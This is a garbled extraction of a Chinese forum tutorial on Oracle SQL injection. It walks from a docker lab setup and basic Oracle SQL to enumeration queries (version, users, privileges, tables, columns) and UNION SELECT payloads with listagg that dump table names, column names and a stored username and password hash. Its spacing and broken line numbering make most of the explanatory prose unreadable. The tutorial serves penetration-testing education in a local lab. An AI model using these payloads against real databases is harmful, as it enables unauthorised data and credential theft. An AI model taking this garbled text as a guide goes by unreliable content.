[1107] 2020-08-10_一篇文章入门Oracle注入

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-16
2020-08-10_一篇文章入门Oracle注入 O r a c l e s 1 y e   C h a B u g   2 0 2 0 - 0 8 - 1 0 O r a c l e 西 M y s q l O r a c l e y 4 使 O r a c l e   D a t a b a s e 便 d o c k e r     O r a c l e   D a t a b a s e   1 1 g 3 .   6 .   1 .   #   2 .   $   d o c k e r   p u l l   d e e p d i v e r / d o c k e r - o r a c l e - x e - 1 1 g 4 .   #   5 .   $   d o c k e r   r u n   - d   - - n a m e   o r a c l e d b   - p   1 0 0 2 : 2 2   - p   1 5 2 1 : 1 5 2 1   d e e p d i v e r / d o c k e r - o r a c l e - 7 .   #   d o c k e r d o c k e r   2 2 8 .   $   d o c k e r   e x e c   - i t   o r a c l e d b   b a s h
d u a l   O r a c l e s e l e c t   O r a c l e 使 , , 使 使 O r a c l e S Q L j a v a P L / S Q L
3 .   6 .   1 0 .   O r a c l e O r a c l e s c o t t t i g e r 1 .   #   2 .       O r a c l e O r a c l e   I n s t a n c e n 4 .   #   5 .       O r a c l e M y s q l M y s q l N     < = >   O r a c l e 7 .   #   8 .       O r a c l e O R A D B F 9 .       d a t a f i l e 1 1 .   #   d b f , o r a 1 2 .       1 3 .       1 .   c o n n e c t   - - 2 .   r e s o u r c e   - - 3 .   d b a   - -
8 .   1 5 .   1 9 .   1 .   #   2 .   S Q L >   s e l e c t   u s e r   f r o m   d u a l ; 3 .   #   s q l i p e n t e s t 4 .   S Q L >   c r e a t e   u s e r   s q l i   i d e n t i f i e d   b y   p e n t e s t ; 5 .   #   c o n n e c t r e s o u r c e 使 6 .   S Q L >   g r a n t   c o n n e c t , r e s o u r c e   t o   s q l i ; 7 .   #   s y s 9 .   #   1 0 .   S Q L >   c r e a t e   t a b l e s p a c e   p e n t e s t 1 1 .       2     d a t a f i l e   ' / t m p / p e n t e s t . d b f ' 1 2 .       3     s i z e   1 0 0 m 1 3 .       4     a u t o e x t e n d   o n 1 4 .       5     n e x t   1 0 m ; 1 6 .   T a b l e s p a c e   c r e a t e d . 1 7 .   #   1 8 .   S Q L >   d r o p   t a b l e s p a c e   p e n t e s t ;   - - 2 0 .   T a b l e s p a c e   d r o p p e d . 1 .   1 .   v a r c h a r ,   v a r c h a r 2     2 .   2 .   N U M B E R         N U M B E R ( n ) n N U M B E R ( m , n ) m n 3 .           e g :   N U M B E R ( 4 , 2 )   9 9 . 9 9 4 .   3 .   D A T A             5 .   4 .   C L O B             4 G 6 .   5 .   B L O B             4 G
8 .   2 0 .   1 .   #   u s e r s 2 .   S Q L >   c r e a t e   t a b l e   u s e r s ( 3 .       2     i d   n u m b e r ( 1 0 ) , 4 .       3     u n a m e   v a r c h a r 2 ( 1 6 ) , 5 .       4     p w d   v a r c h a r 2 ( 3 2 ) 6 .       5     ) 7 .       6     ; 9 .   T a b l e   c r e a t e d . 1 0 .   #   1 1 .   S Q L >   a l t e r   t a b l e   u s e r s   a d d   e m a i l   v a r c h a r 2 ( 4 0 ) ; 1 2 .   #   1 3 .   S Q L >   a l t e r   t a b l e   u s e r s   m o d i f y   e m a i l   c h a r ( 4 0 ) ; 1 4 .   #   1 5 .   S Q L >   a l t e r   t a b l e   u s e r s   r e n a m e   c o l u m n   e m a i l   t o   s e x ; 1 6 .   #   1 7 .   S Q L >   a l t e r   t a b l e   u s e r s   d r o p   c o l u m n   s e x ; 1 8 .   #   v a l u e s 使 1 9 .   S Q L >   i n s e r t   i n t o   u s e r s   ( i d , u n a m e , p w d )   v a l u e s ( 1 , ' a d m i n ' , ' a b 7 1 g i e d a s 9 8 g 1 o 2 d a s g d 1 2 e 9 8 g ' 2 1 .   1   r o w   c r e a t e d . 2 2 .   #   2 3 .   u p d a t e   u s e r s   s e t   u n a m e = ' a d m i n i s t r a t o r ' ; 2 4 .   #   2 5 .   d e l e t e   f r o m   u s e r s   w h e r e   u n a m e = ' a d m i n i s t r a t o r ' ;
3 .   6 .   9 .   O r c a l e 3 .   9 .   1 0 .   O r a c l e   1 .   #   1 使 2 .   S Q L >   c r e a t e   s e q u e n c e   s _ u s e r s ; 4 .   S e q u e n c e   c r e a t e d . 5 .   S Q L >   i n s e r t   i n t o   u s e r s   ( i d , u n a m e , p w d )   v a l u e s ( s _ u s e r s . n e x t v a l , ' c e s h i ' , ' d 8 1 b o j d 0 9 s h a 1 o n p m d 0 9 a ' 7 .   1   r o w   c r e a t e d . 8 .   S Q L >   s e l e c t   *   f r o m   u s e r s ; 1 0 .                   I D   U N A M E                         P W D 1 1 .   - - - - - - - - - -   - - - - - - - - - - - - - - - -   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 2 .                     1   a d m i n                         a b 7 1 g i e d a s 9 8 g 1 o 2 d a s g d 1 2 e 9 8 g 1 3 .                     3   c e s h i                         d 8 1 b o j d 0 9 s h a 1 o n p m d 0 9 a 1 .   #   O r a c l e 使 ` ` | | ` ` 2 .   S Q L >   s e l e c t   ' p e n ' | | ' t e s t '   f r o m   d u a l ; 4 .   ' P E N ' | | 5 .   - - - - - - - 6 .   p e n t e s t 7 .   #   m y s q l l i m i t 8 .   S Q L >   s e l e c t   *   f r o m   u s e r s   w h e r e   r o w n u m < 2 ;   - - r o w n u m < , < = , ! = 1 1 .   #   1 2 .   - - 1 3 .   - -   - 1 4 .   - - 1 5 .   / * * /
2 .   1 0 .   1 3 .   1 7 .   2 0 .   2 4 .   2 8 .   3 1 .   3 4 .   3 7 .   1 .   S Q L >   s e l e c t   b a n n e r   f r o m   v $ v e r s i o n ; 3 .   B A N N E R 4 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 5 .   O r a c l e   D a t a b a s e   1 1 g   E x p r e s s   E d i t i o n   R e l e a s e   1 1 . 2 . 0 . 2 . 0   -   6 4 b i t   P r o d u c t i o n 6 .   P L / S Q L   R e l e a s e   1 1 . 2 . 0 . 2 . 0   -   P r o d u c t i o n 7 .   C O R E         1 1 . 2 . 0 . 2 . 0             P r o d u c t i o n 8 .   T N S   f o r   L i n u x :   V e r s i o n   1 1 . 2 . 0 . 2 . 0   -   P r o d u c t i o n 9 .   N L S R T L   V e r s i o n   1 1 . 2 . 0 . 2 . 0   -   P r o d u c t i o n 1 1 .   #   使 1 2 .   S Q L >   s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e   b a n n e r   l i k e   ' O r a c l e % ' ; 1 4 .   B A N N E R 1 5 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 6 .   O r a c l e   D a t a b a s e   1 1 g   E x p r e s s   E d i t i o n   R e l e a s e   1 1 . 2 . 0 . 2 . 0   -   6 4 b i t   P r o d u c t i o n 1 8 .   #   1 9 .   S Q L >   s e l e c t   u s e r   f r o m   d u a l ; 2 1 .   U S E R 2 2 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 2 3 .   S Q L I 2 5 .   #   2 6 .   S Q L >   s e l e c t   u s e r n a m e   f r o m   a l l _ u s e r s ; 2 7 .   S E L E C T   n a m e   F R O M   s y s . u s e r $ ;   - -   2 9 .   #   3 0 .   S Q L >   s e l e c t   *   f r o m   s e s s i o n _ p r i v s ; 3 2 .   #   3 3 .   S Q L >   s e l e c t   d i s t i n c t   o w n e r , t a b l e _ n a m e   f r o m   a l l _ t a b l e s ; 3 5 .   #   t a b l e _ n a m e 3 6 .   S Q L >   s e l e c t   c o l u m n _ n a m e   f r o m   a l l _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' U S E R S ' ; 3 8 .   C O L U M N _ N A M E 3 9 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 4 0 .   I D 4 1 .   U N A M E 4 2 .   P W D
O r a c l e 2 .   6 .   8 .   2 .   L I S T A G G O R D E R   B Y 3 . 4 . 访 访 M y s q l i n f o r m a t i o n _ s c h e m a . t a b l e s U S E R E N V 1 .   S Q L >   s e l e c t   S Y S _ C O N T E X T ( ' U S E R E N V ' , ' S E S S I O N _ U S E R ' )   f r o m   d u a l ; 3 .   S Y S _ C O N T E X T ( ' U S E R E N V ' , ' S E S S I O N _ U S E R ' ) 4 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 5 .   S Q L I 7 .   S Q L >   s e l e c t   S Y S _ C O N T E X T ( ' U S E R E N V ' , ' A U T H E N T I C A T E D _ I D E N T I T Y ' )   f r o m   d u a l ; 9 .   S Y S _ C O N T E X T ( ' U S E R E N V ' , ' A U T H E N T I C A T E D _ I D E N T I T Y ' ) 1 0 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 1 .   s q l i p a r a m e t e r 1 . G L O B A L _ N A M E m e a s u r e _ e x p r U S E R _ T A B L E S A L L _ T A B L E S
5 . A L L A L L T A B L E S 6 . 访 访 7 . 8 . A L L _ T A B L E S D B A 3 .   9 .   O r a c l e O r a l c e s e l e c t 使 使 d u a l ) D B A _ A L L _ T A B L E S A L L _ A L L _ T A B L E S U S E R _ A L L _ T A B L E S D B A _ T A B L E S 1 .   #   2 .   S Q L >   s e l e c t   *   f r o m   g l o b a l _ n a m e ; 4 .   G L O B A L _ N A M E 5 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 6 .   X E 7 .   #   m y s q l g r o u p _ c o n c a t 8 .   S Q L >   s e l e c t   l i s t a g g ( c o l u m n _ n a m e , ' ~ ' )   w i t h i n   g r o u p   ( o r d e r   b y   c o l u m n _ n a m e )   f r o m   u s e r _ t a b _ c o l u m n s 1 0 .   L I S T A G G ( C O L U M N _ N A M E , ' ~ ' ) W I T H I N G R O U P ( O R D E R B Y C O L U M N _ N A M E ) 1 1 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 2 .   I D ~ P W D ~ U N A M E
2 .   5 .   8 .   1 3 .   1 5 .   1 8 .   2 3 .   2 7 .   3 2 .   1 .   S Q L >   s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 2   u n i o n   s e l e c t   n u l l , n u l l , n u l l   f r o m   d u a l ; 3 .                   I D   U N A M E                         P W D 4 .   - - - - - - - - - -   - - - - - - - - - - - - - - - -   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 6 .   #   7 .   S Q L >   s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 2   u n i o n   s e l e c t   n u l l , n u l l , ( s e l e c t   l i s t a g g ( t a b l e _ n a m e 9 .                   I D   U N A M E 1 0 .   - - - - - - - - - -   - - - - - - - - - - - - - - - - 1 1 .   P W D 1 2 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 4 .   A D D R E S S ~ U S E R S 1 6 .   #   1 7 .   S Q L >   s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 2   u n i o n   s e l e c t   n u l l , n u l l , ( s e l e c t   l i s t a g g ( c o l u m n _ n a m e 1 9 .                   I D   U N A M E 2 0 .   - - - - - - - - - -   - - - - - - - - - - - - - - - - 2 1 .   P W D 2 2 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 2 4 .   I D : P W D : U N A M E 2 5 .   #   2 6 .   S Q L >   s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 2   u n i o n   s e l e c t   n u l l , n u l l , ( s e l e c t   l i s t a g g ( u n a m e 2 8 .           I D   U N A M E 2 9 .   - - - - - - - - - -   - - - - - - - - - - - - - - - - 3 0 .   P W D 3 1 .   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 3 3 .   a d m i n & a b 7 1 g i e d a s 9 8 g 1 o 2 d a s g d 1 2 e 9 8 g
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则